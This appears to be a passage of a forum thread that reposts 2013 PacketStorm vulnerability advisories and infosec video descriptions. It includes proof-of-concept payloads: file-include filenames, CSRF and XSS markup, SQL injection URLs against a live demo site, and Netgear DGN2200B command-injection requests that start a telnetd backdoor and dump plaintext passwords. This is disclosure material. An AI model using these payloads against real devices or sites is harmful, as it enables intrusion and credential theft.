================= 1.1 The local File/Path Include web vulnerability can be exploited by remote attacker without required application user account (no password: standard) and also without user interaction. For demonstration or reproduce ... Local Path Include Vulnerability PoC: POSTDATA =-----------------------------249872938427813 Content-Disposition: form-data; name="file"; filename="[INJECTED FILE OR PATH REQUEST]<.png" Content-Type: image/png --- ÿØÿà Reference(s): http://192.168.0.10/upload 1.2 The command injection web vulnerability can be exploited by local attackers with required device application user account and with low user interaction. For demonstration or reproduce ... Command Injection via Devicename PoC: <body> <a href="http://192.168.0.10/" title="Click here to refresh"> <div id="header">Files on: IPad360 ¥337>"<[COMMAND INJECTION VIA DEVICENAME].xht"></div> </a> <div id="wrapper"> <div id="scroller"> <ul id="thelist"> </ul> </div> </div> Reference(s): http://192.168.0.10/ 1.3 The client side cross site request forgery web vulnerability can be exploited by remote attackers without application user account and with medium or high required user interaction. For demonstration or reproduce ... <html> <head><body> <title>POC CSRF - Delete Files Exploit</title> <Referer=http://192.168.0.10/%3Cdelete%3E?file=x.png> <Referer=http://192.168.0.10/%3Cdelete%3E?file=x.jpg> <Referer=http://192.168.0.10/%3Cdelete%3E?file=x.gif> <Referer=http://192.168.0.10/%3Cdelete%3E?file=x.pdf> <Referer=http://192.168.0.10/%3Cdelete%3E?file=x.txt> <Referer=http://192.168.0.10/%3Cdelete%3E?file=x.doc> <Referer=http://192.168.0.10/%3Cdelete%3E?file=x.php> </body></head> </html> Reference(s): http://192.168.0.10/%3Cdelete%3E http://192.168.0.10/%3Cdelete%3E?file= Risk: ===== 1.1 The security risk of the file include web vulnerability is estimated as critical because of no standard password protection. 1.2 The security risk of the local command injection vulnerability via device name is estimated as high(-). 1.3 The security risk of the client side cross site request forgery web vulnerability is estimated as low(+). Credits: ======== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com) Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. Copyright © 2013 | Vulnerability Laboratory --- Am 19.02.2013 03:29, schrieb Packet Storm: > There's no content. > > On Mon, Feb 18, 2013 at 09:36:51PM +0100, Vulnerability Lab wrote: >> Title: >> ====== >> MyFi Wireless Disk 1.2 iPad iPhone - Multiple Vulnerabilities >> >> >> Date: >> ===== >> 2013-02-13 >> >> >> References: >> =========== >> http://www.vulnerability-lab.com/get_content.php?id=864 >> >> >> VL-ID: >> ===== >> 864 >> >> >> Status: >> ======== >> Published >> >> >> Disclaimer: >> =========== >> The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, >> either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- >> Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business >> profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some >> states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation >> may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases >> or trade with fraud/stolen material. >> >> Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register >> Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com >> Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com >> Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab >> Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php >> >> Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. >> Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other >> media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and >> other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), >> modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. >> >> Copyright © 2013 | Vulnerability Laboratory >> >> -- >> VULNERABILITY RESEARCH LABORATORY >> LABORATORY RESEARCH TEAM >> CONTACT: research@vulnerability-lab.com >> -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: research@vulnerability-lab.com Source: PacketStorm
  11. Praetorian503
    CKEditor version 4.0.1 suffers from cross site request forgery, cross site scripting, and path disclosure vulnerabilities. =========================================== Vulnerable Software: ckeditor 4.0.1 standard Download: http://download.cksource.com/CKEditor/CKEditor/CKEditor%204.0.1/ckeditor_4.0.1_standard.zip Vulns: Full Path Disclosure && XSS =========================================== Tested On: Debian squeeze 6.0.6 Server version: Apache/2.2.16 (Debian) Apache traffic server 3.2.0 MYSQL: 5.1.66-0+squeeze1 PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) (built: Aug 6 2012 20:08:59) Copyright (c) 1997-2009 The PHP Group Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies with Suhosin v0.9.32.1, Copyright (c) 2007-2010, by SektionEins GmbH =========================================== Vulnerable Code: /ckeditor/samples/assets/posteddata.php =============SNIP BEGINS==================== root@debian:/etc/apache2/htdocs/hacker1/admin/ckeditor/samples/assets# cat posteddata.php <!DOCTYPE html> <?php /* Copyright (c) 2003-2013, CKSource - Frederico Knabben. All rights reserved. For licensing, see LICENSE.html or http://ckeditor.com/license */ ?> <html> <head> <meta charset="utf-8"> <title>Sample — CKEditor</title> <link rel="stylesheet" href="sample.css"> </head> <body> <h1 class="samples"> CKEditor — Posted Data </h1> <table border="1" cellspacing="0" id="outputSample"> <colgroup><col width="120"></colgroup> <thead> <tr> <th>Field Name</th> <th>Value</th> </tr> </thead> <?php if ( isset( $_POST ) ) $postArray = &$_POST ; // 4.1.0 or later, use $_POST else $postArray = &$HTTP_POST_VARS ; // prior to 4.1.0, use HTTP_POST_VARS foreach ( $postArray as $sForm => $value ) { if ( get_magic_quotes_gpc() ) $postedValue = htmlspecialchars( stripslashes( $value ) ) ; else $postedValue = htmlspecialchars( $value ) ; ?> <tr> <th style="vertical-align: top"><?php echo $sForm?></th> <td><pre class="samples"><?php echo $postedValue?></pre></td> </tr> <?php } ?> </table> <div id="footer"> <hr> <p> CKEditor - The text editor for the Internet - <a class="samples" href="http://ckeditor.com/">http://ckeditor.com</a> </p> <p id="copy"> Copyright © 2003-2013, <a class="samples" href="http://cksource.com/">CKSource</a> - Frederico Knabben. All rights reserved. </p> </div> </body> </html> =============SNIP ENDS HERE==================== FULL Path Disclosure example: URL: http://hacker1.own/admin/ckeditor/samples/sample_posteddata.php METHOD: $_POST HEADERS: Host: hacker1.own User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 30 $_POST DATA TO SEND: bangbangbang[]=PATH DISCLOSURE Result: Warning: htmlspecialchars() expects parameter 1 to be string, array given in /etc/apache2/htdocs/hacker1/admin/ckeditor/samples/assets/posteddata.php on line 38 Print screen: http://i076.radikal.ru/1302/84/edbe3f8f4524.png ================================================= CSRF+XSS <body onload="javascript:document.forms[0].submit()"> <form name="form1" method="post" action="http://hacker1.own/admin/ckeditor/samples/sample_posteddata.php" enctype="multipart/form-data"> <input type="hidden" name="<script>alert('AkaStep');</script>" id="fupl" value="SENDF"></li> </form> ================================================= Print Screen: http://i062.radikal.ru/1302/e6/25ef023dd589.png ================================================= And here is fixed version: /ckeditor/samples/assets/posteddata.php ================SNIP BEGINS======================= <!DOCTYPE html> <?php /* Copyright (c) 2003-2013, CKSource - Frederico Knabben. All rights reserved. For licensing, see LICENSE.html or http://ckeditor.com/license */ ?> <html> <head> <meta charset="utf-8"> <title>Sample — CKEditor</title> <link rel="stylesheet" href="sample.css"> </head> <body> <h1 class="samples"> CKEditor — Posted Data </h1> <table border="1" cellspacing="0" id="outputSample"> <colgroup><col width="120"></colgroup> <thead> <tr> <th>Field Name</th> <th>Value</th> </tr> </thead> <?php if ( isset( $_POST ) ) $postArray = &$_POST ; // 4.1.0 or later, use $_POST else $postArray = &$HTTP_POST_VARS ; // prior to 4.1.0, use HTTP_POST_VARS foreach ( $postArray as $sForm => $value ) { if ( get_magic_quotes_gpc() ) $postedValue = htmlspecialchars( stripslashes((string) $value ) ) ; else $postedValue =htmlspecialchars((string) $value ) ; ?> <tr> <th style="vertical-align: top"><?php echo htmlspecialchars((string)$sForm);?></th> <td><pre class="samples"><?php echo $postedValue?></pre></td> </tr> <?php } ?> </table> <div id="footer"> <hr> <p> CKEditor - The text editor for the Internet - <a class="samples" href="http://ckeditor.com/">http://ckeditor.com</a> </p> <p id="copy"> Copyright © 2003-2013, <a class="samples" href="http://cksource.com/">CKSource</a> - Frederico Knabben. All rights reserved. </p> </div> </body> </html> =============ENJOYYY==================== KUDOSSSSSSS ========================================= packetstormsecurity.org packetstormsecurity.com packetstormsecurity.net securityfocus.com cxsecurity.com security.nnov.ru securtiyvulns.com securitylab.ru secunia.com securityhome.eu exploitsdownload.com osvdb.com websecurity.com.ua 1337day.com itsecuritysolutions.org to all Aa Team + to all Azerbaijan Black HatZ + *Especially to my bro CAMOUFL4G3 * To All Turkish Hackers Also special thanks to: ottoman38 & HERO_AZE =========================================== /AkaStep Source: PacketStorm
  12. Praetorian503
    RTTucson Quotations Database Script suffers from remote SQL injection and cross site scripting vulnerabilities. ################################################################################## __ _ _ ____ / /___ _____ (_)_____________ ______(_)__ _____ / __ \_________ _ __ / / __ `/ __ \/ / ___/ ___/ __ `/ ___/ / _ \/ ___// / / / ___/ __ `/ / /_/ / /_/ / / / / (__ |__ ) /_/ / / / / __(__ )/ /_/ / / / /_/ / \____/\__,_/_/ /_/_/____/____/\__,_/_/ /_/\___/____(_)____/_/ \__, / /____/ ################################################################################## RTTucson Quotations Database Script, Multiple Vulnerabilities Software Page: http://www.rttucson.com/index.html Script Demo: http://www.rttucson.com/quotations/default.php Author(Pentester): 3spi0n On Social: Twitter.Com/eyyamgudeer Greetz: Grayhatz Inc. and Janissaries Platform. ################################################################################## [~] MySQL Injection on Demo Site [+] (author.php, ID Param) >>> http://www.rttucson.com/quotations/author.php?ID=5' (MySQLi Found) [+] (category_quotes.php, ID Param) >>> http://www.rttucson.com/quotations/category_quotes.php?ID=9' (MySQLi Found) [~] XSS on Demo Site >> (quote_search.php, keywords Param) >>> http://www.rttucson.com/quotations/quote_search.php?keywords=<h1>Xssed-3spi0n</h1> Source: PacketStorm
  13. Praetorian503
    Description: “No Tools? No Problem! Building a PowerShell Botnet” Christopher “@obscuresec” Campbell Source : - ShmooCon Firetalks 2013 (Hacking Illustrated Series InfoSec Tutorial Videos) Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Shmoocon 2013 - No Tools? No Problem! Building A Powershell Botnet Christopher
  14. Praetorian503
    Description: “Managed Service Providers: Pwn One and Done” Damian “@integrisec” Profancik Source : - ShmooCon Firetalks 2013 (Hacking Illustrated Series InfoSec Tutorial Videos) Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Shmoocon 2013 - Managed Service Providers: Pwn One And Done” Damian
  15. Praetorian503
    Description: “Drones: Augmenting your cyber attack tool bag with aerial weapon systems” by Zac “@ph3n0” Hinkel Source : - ShmooCon Firetalks 2013 (Hacking Illustrated Series InfoSec Tutorial Videos) Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Shmoocon 2013 - Drones: Augmenting Your Cyber Attack Tool Bag With Aerial Weapon Systems
  16. Praetorian503
    USB Sharp version 1.3.4 suffers from local file inclusion and persistent cross site scripting vulnerabilities. Title: ====== USB Sharp v1.3.4 iPad iPhone - Multiple Web Vulnerabilities Date: ===== 2013-02-16 References: =========== http://www.vulnerability-lab.com/get_content.php?id=873 VL-ID: ===== 873 Common Vulnerability Scoring System: ==================================== 6.3 Introduction: ============= USB Sharp Pro can turn your iPhone, ipad, ipod into a large Capacity, Portable and Wireless storage disk, Facilitate and efficient manage of your files! Support for editing php, js, html file. Support the open format, such as flv,asf,rmvb,avi,mpg,mkv,wmv. Dropbox Operate, multiple files upload & download, history,create folder Add manual Chrome and Firefox Supported upload multiple files Extract files from encryption .rar Optimization pdf reader, Support for importing videos/photos to Photo Library Support for exporting video from Photo Library Search file(folder) name function added Picture Viewer Improved Unzip type added Add authentication for local login Add authentication for wifi transfer Custom background image; ... ... ... Full screen view files Supported Multiple photo import Supported Sorting by file name?create time and file type View, copy, move, delete, rename, email, zip Compression and unzip files/folders Encryption folder, protect your files Extract all files from a compressed .zip file Glide deleting function Select all and Cancel all operate Transferring files by wifi and iTunes file sharing Email multiple files, folder Supported Open email attachments Photo import Supported Open files in other applications Landscape mode supported iPad-compatible Plain text: .txt .php .js .html Document: .pdf .csv .rtf .rtfd .doc .docx .xls .xlsx .ppt .pptx (office 2003 or later) Image: .png .jpg .jpeg .gif .bmp .xbm .tif .tiff Audio: .mp3 .m4a .aac Video: .mp4 .mov .m4v .3gp .flv .asf .rmvb .avi .mpg .mkv .wmv Web: .htm .html .xhtml Compressed: .zip .rar Cost: 2,99$ - iPad or iPhone (iTunes or Appstore) (Copy of the Homepage: https://itunes.apple.com/us/app/usb-sharp-pro/id436590784 ) Abstract: ========= The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the mobile USB Sharp v1.3.4 app for the apple ipad & iphone. Report-Timeline: ================ 2013-02-16: Public Disclosure Status: ======== Published Affected Products: ================== Apple AppStore Product: USB Sharp - Web Server Application 1.3.4 Exploitation-Technique: ======================= Remote Severity: ========= High Details: ======== 1.1 A local file include web vulnerability via POST request method is detected in the mobile USB Sharp v1.3.4 app for the apple ipad & iphone. The vulnerability allows remote attackers via POST method to inject local app webserver folders to request unauthorized local webserver files. The vulnerbility is located in the upload file module of the webserver (http://192.168.0.10/) when processing to load a manipulated filename via POST. The execution of the injected path or file request will occur when the attacker is processing to watch the file dir listing. Exploitation of the vulnerability requires no user interaction and can be done without privileged application user account (no password standard). Successful exploitation of the vulnerability results in unauthorized path or file access via local file or path include attack. Vulnerable Application(s): [+] USB Sharp v1.3.4 - ITunes or AppStore (Apple) Vulnerable Module(s): [+] File Upload (Web Server) [Remote] Vulnerable Parameter(s): [+] filename Affected Module(s): [+] Filename Dir Index Listing 1.2 A persistent input validation vulnerability is detected in the mobile USB Sharp v1.3.4 app for the apple ipad & iphone. The bug allows an attacker (remote) to implement/inject malicious script code on the application side (persistent) of the app web service. The vulnerability is located in the index file dir listing module of the webserver (http://192.168.0.10:41491/) when processing to inject via POST method manipulated new chxItem parameters. The persistent script code will be executed out of the main index file dir listing module when the service is processing to list the new foldername as item. Exploitation of the vulnerability requires low or medium user interaction without privileged application user account. Successful exploitation of the vulnerability can lead to persistent session hijacking (customers), account steal via persistent web attacks, persistent phishing or stable (persistent) certificate mail notification context manipulation. Vulnerable Application(s): [+] USB Sharp v1.3.4 - ITunes or AppStore (Apple) Vulnerable Module(s): [+] Index File Dir Listing Vulnerable Parameter(s): [+] Foldername (items > chxItem) Affected Module(s): [+] Index Listing Proof of Concept: ================= 1.1 The local file include web vulnerability can be exploited by remote attackers without user interaction and without privileged application user account. For demonstration or reproduce ... Example: File > Upload via POST > Tamper Session > Change Filename Value to File or Path + Extension > Open Listing > Execution PoC: (POST) -----------------------------1337341202721337 Content-Disposition: form-data; name="file"; filename="..%2F..%2F..%2F..%2Fcmd>home>tmp%00<'.JPG" Content-Type: image/jpg Note: Encode the request ago to bypass the encoding validation of the input. (%2F) Reference(s): http://192.168.0.10:41491/ 1.2 The persistent input validation vulnerability can be exploited by remote attackers without user interaction and without privileged application user account. For demonstration or reproduce ... PoC: Index - Folder Dir Listing <tbody id="filelist"><tr><td><input name="chxItem" value="[PERSISTENT INJECTED SCRIPT CODE!]" onclick="selChkItem(this)" type="checkbox"></td><td><a href="/[PERSISTENT INJECTED SCRIPT CODE!]%3C?guid= 47E79C76-D4C2-4086-B695-3CEE71A6B5F3&type=child" class="file"><span style="vertical-align:middle;"><img src="/Folder.png" style="border:0;vertical-align:middle" ;=""></span>%20"><[PERSISTENT INJECTED SCRIPT CODE!];)" <<="" a=""></td><td></td> <td>2013-02-10 22:57:54</td><td><input name="commit" type="button" value="Delete" onclick="DelegateData('/[PERSISTENT INJECTED SCRIPT CODE!]','47E79C76-D4C2-4086-B695-3CEE71A6B5F3');" class='button' /></form></td></tr></tbody></table></iframe></a></td></tr><tr><td colspan="5"><span class="total">1 items</span> </td></tr></tbody> Reference(s): http://192.168.0.10:41491/ Risk: ===== 1.1 The security risk of the local file/path include web vulnerability via POST request method is estimated as high(+). 1.2 The security risk of the persistent input validation web vulnerability is estimated as medium. Credits: ======== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com) Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. Copyright © 2013 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: research@vulnerability-lab.com Source: PacketStorm
  17. Praetorian503
    Simple methods that we know already. It's ok for beginners Image from video is everything.
  18. Praetorian503
    Sanse mici sa dai jos un site 'mare' cu aceste programe. Aveti Slowloris/T50 Sukhoi PAK FA Mixed Packet Injector pe backtrack.
  19. Praetorian503
    Description: A breakdown of SQL injection in non-technical terms. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Sql Injection
  20. Praetorian503
    Description: ColdFusion is a somewhat forgotten but still very prevalent web application development platform. This presentation is a technical survey of ColdFusion security that will be of interest mostly to code auditors, penetration testers, and developers. In the talk, we’ll cover the history of the ColdFusion platform and its relevance to today’s security landscape. We’ll describe basics of ColdFusion markup, control flow, functions, and components and demonstrate how to identify common web application vulnerabilities in the source code. We’ll also delve into ColdFusion J2EE internals, showing what CFML pages and components look like when compiled down to Java, and describing some of the unusual behavior we’ve observed at that level. Included in the talk is a detailed description of the WAR/EAR structure for compiled ColdFusion apps. We'll release open-source tools to aid reverse engineers in working with ColdFusion's proprietary classfile format. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Blackhat 2010 - Deconstructing Coldfusion
  21. Praetorian503
    Description: The Google Web Toolkit (GWT) produces some of the slickest web-based applications out there; it’s easy to understand why it has been gathering popularity. But there’s obviously more to writing a secure application than making the UI nice and shiny. The framework’s functionality is not limited to GUI controls - it also has significant support for remote procedure calls. The browser-side code is implemented entirely in JavaScript that the GWT generates from developer-written Java code. While GWT RPC can be implemented securely, many developers either rely on the JavaScript obfuscation, or don’t realize how their Java code is going to be split between the server & client. Either way, insecure GWT remoting is very common. This presentation will demonstrate how to exploit common vulnerabilities in GWT applications, particularly with RPC functionality. Non-human readable format of the JavaScript makes penetration testing GWT applications very time consuming. To aid with testing, the presenters are releasing REGWT, a tool to reverse engineer GWT applications. It will allow a pen tester to map out GWT RPC methods that would otherwise be hidden and easily test them for various vulnerabilities. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Blackhat 2010 - Gwt Security: Don't Get Distracted By Bright Shiny Objects
  22. Praetorian503
    Description: How I Met Your Girlfriend: The discovery and execution of entirely new classes of attacks executed from the Web in order to meet your girlfriend. This includes newly discovered attacks including HTML5 client-side XSS (without XSS hitting the server!), PHP session hijacking and weak random numbers (accurately guessing PHP session cookies), browser protocol confusion (turning a browser into an SMTP server), firewall and NAT penetration via Javascript (turning your router against you), remote iPhone Google Maps hijacking (iPhone penetration combined with HTTP man-in-the-middle), extracting extremely accurate geolocation information from a Web browser (not using IP geolocation), and more. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Blackhat 2010 - How I Met Your Girlfriend
  23. Praetorian503
    Description: In this, Part 10, of the Aircrack-ng Megaprimer series, I discuss the tool, airtun-ng. Airtun-ng is a very useful and versatile tool that creates a virutal tunnel interface. Please visit us at SecurityTube for more information security videos and for the compelete megaprimer series: Welcome to SecurityTube.net As always, if you have any questions, comments, suggestions or feedback you can leave it in the comments section below or you can contact me via e-mail at: bennett [at] securitytube [dot] net Please follow me on twitter: @pbtomlinson Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Aircrack-Ng Megaprimer Part 10: Airtun-Ng
  24. Praetorian503
    Netgear DGN2200B suffers from remote command injection and cross site scripting vulnerabilities. Device Name: DGN2200B Vendor: Netgear ============ Vulnerable Firmware Releases: ============ Hardwareversion DGN2200B Firmwareversion V1.0.0.36_7.0.36 - 04/01/2011 ============ Device Description: ============ Infos: http://www.netgear.com/home/products/wirelessrouters/work-and-play/dgn2200.aspx http://www.netgear.de/products/home/wireless_routers/work-and-play/DGN2200B.aspx# Firmware download: http://kb.netgear.com/app/answers/detail/a_id/18990/~/dgn2200%2Fdgn2200b-firmware-version-1.0.0.36 ============ Shodan Torks ============ Shodan Search: NETGEAR DGN2200 ============ Vulnerability Overview: ============ * OS Command Injection in the PPOE configuration: The vulnerability is caused by missing input validation in the pppoe_username parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to upload and execute a backdoor to compromise the device. Param: pppoe_username Example Request: POST /pppoe.cgi HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.0.1/BAS_pppoe.htm Cookie: uid=vjkqK779eJ Authorization: Basic xxxxx= Content-Type: application/x-www-form-urlencoded Content-Length: 593 Connection: close login_type=PPPoE%28PPP+over+Ethernet%29&pppoe_username=%26%20ping%20-c%201%20192%2e168%2e0%2e2%20%26&pppoe_passwd=69cw20hb&pppoe_servicename=&pppoe_dod=1&pppoe_idletime=5&WANAssign=Dynamic&DNSAssign=0&en_nat=1&MACAssign=0&apply=%C3%9Cbernehmen&runtest=yes&wan_ipaddr=0.0.0.0&pppoe_localip=0.0.0.0&wan_dns_sel=0&wan_dns1_pri=0.0.0.0&wan_dns1_sec=...&wan_hwaddr_sel=0&wan_hwaddr_def=84%3A1B%3A5E%3A01%3AE7%3A05&wan_hwaddr2=84%3A1B%3A5E%3A01%3AE7%3A05&wan_hwaddr_pc=5C%3A26%3A0A%3A2B%3AF0%3A3F&wan_nat=1&opendns_parental_ctrl=0&pppoe_flet_sel=&pppoe_flet_type=&pppoe_temp=&opendns_parental_ctrl=0 => wait around 30 seconds till the configuration is saved and activated start telnetd on port 1337: %26%20telnetd -p 1337%20%26 Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/DGN2200B-OS-Command-Injection-Telnetd-started.png * Insecure Cryptographic Storage: There is no password hashing implemented and so it is saved in plain text on the system: ~ # cat /etc/passwd nobody:*:0:0:nobody:/:/bin/sh admin:password:0:0:admin:/:/bin/sh guest:guest:0:0:guest:/:/bin/sh ~ # * stored XSS Injecting scripts into the parameter DomainName mode reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code. -> Zugriffsbeschränkungen -> Dienste -> neuen Dienst anlegen -> Dienstname Param: userdefined Original request: POST /fw_serv_add.cgi HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.0.1/fw_serv.cgi Cookie: uid=vjkqK779eJ Authorization: Basic xxxx= Content-Type: application/x-www-form-urlencoded Content-Length: 114 userdefined="><img src="0" onerror=alert(1)>&protocol=TCP&portstart=1&portend=5&apply=%C3%9Cbernehmen&which_mode=0 You could also change the request method to HTTP GET: http://192.168.0.1/fw_serv_add.cgi?userdefined="><img%20src="0"%20onerror=alert(1)>&protocol=TCP&portstart=1&portend=5&apply=%C3%9Cbernehmen&which_mode=0 The scriptcode gets executed if you try to edit this service again. Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/DGN2200B-Stored-XSS-Dienste.png * stored XSS: Injecting scripts into the parameter ssid mode reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code. -> Wireless-Konfiguration -> Netzwerkname (SSID) Param: ssid POST /wlg_sec_profile_main.cgi HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.0.1/WLG_wireless2_2.htm Cookie: uid=vjkqK779eJ Authorization: Basic xxxx= Content-Type: application/x-www-form-urlencoded Content-Length: 328 ssidSelect=1&ssid=%2522%253E%253Cscript%253Ealert%25281%2529%253&WRegion=5&w_channel=0&opmode=20n&enable_ap=1&enable_ssid_bc=1&security_type=AUTO-PSK&passphrase=friendlytrain824&Apply=%C3%9Cbernehmen&tempSetting=0&tempRegion=5&initChannel=0&h_opmode=20n&wds_enable=0&ver_type=WW&pfChanged=0&ssid_sel_submit=0&secure_sel_submit=0 ============ Solution ============ No known solution available. ============ Credits ============ The vulnerability was discovered by Michael Messner Mail: devnull#at#s3cur1ty#dot#de http://www.s3cur1ty.de/m1adv2013-015 Twitter: @s3cur1ty_de ============ Time Line: ============ 17.12.2012 - discovered vulnerability 18.12.2012 - Privately reported all details to vendor 18.12.2012 - vendor responded that they will check the reported vulnerability details 29.01.2013 - vendor contacted me to test a new firmware 29.01.2013 - /me responded that I need more details about the fixes before I will test the new firmware 30.01.2013 - vendor reponded that I should just check it 31.01.2013 - /me responded that I will not check the firmware if they do not provide more details (do not waste my time again!) 11.02.2013 - vendor responded that he has to declare it internally 15.02.2013 - public release ===================== Advisory end ===================== Source: PacketStorm
  25. Praetorian503
